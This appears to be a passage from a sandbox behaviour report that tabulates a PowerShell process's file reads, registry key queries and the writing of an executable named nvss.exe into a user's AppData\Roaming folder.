| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\kFT6uTQW\Desktop | type = file_attributes |
|
9 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | type = file_type |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | type = file_attributes |
|
3 | |
| Open | STD_INPUT_HANDLE |
|
1 | ||
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
3 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 4096 |
|
41 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 4096 |
|
17 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 4096 |
|
62 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 3895 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 201, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 4096 |
|
21 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 3687 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 409, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 2228 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 844, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 3736 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 360, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | size = 4096, size_out = 1459 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | size = 4096, size_out = 0 |
|
1 | |
| Write | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | size = 4096 |
|
7 | |
| Write | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | size = 8681 |
|
1 | |
| Write | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | size = 4616 |
|
1 | |
| Write | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | size = 20588 |
|
1 | |
| Write | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | size = 52272 |
|
1 | |
| Write | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | size = 14520 |
|
1 | |
| Write | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | size = 64208 |
|
1 | |
| Write | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | size = 7260 |
|
1 | |
| Write | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | size = 52532 |
|
1 | |
| Write | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | size = 8712 |
|
1 | |
| Write | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | size = 51080 |
|
1 | |
| Write | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | size = 63888 |
|
1 | |
| Write | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | size = 5808 |
|
1 | |
| Write | C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe | size = 20107 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Environment |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell |
|
2 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
2 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
9 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
2 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
4 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
2 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance |
|
1 | ||
| Open Key | HKEY_CURRENT_USER |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
2 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
2 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
2 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
2 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
2 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
2 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
2 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
2 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
2 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
2 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | ||
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | ||
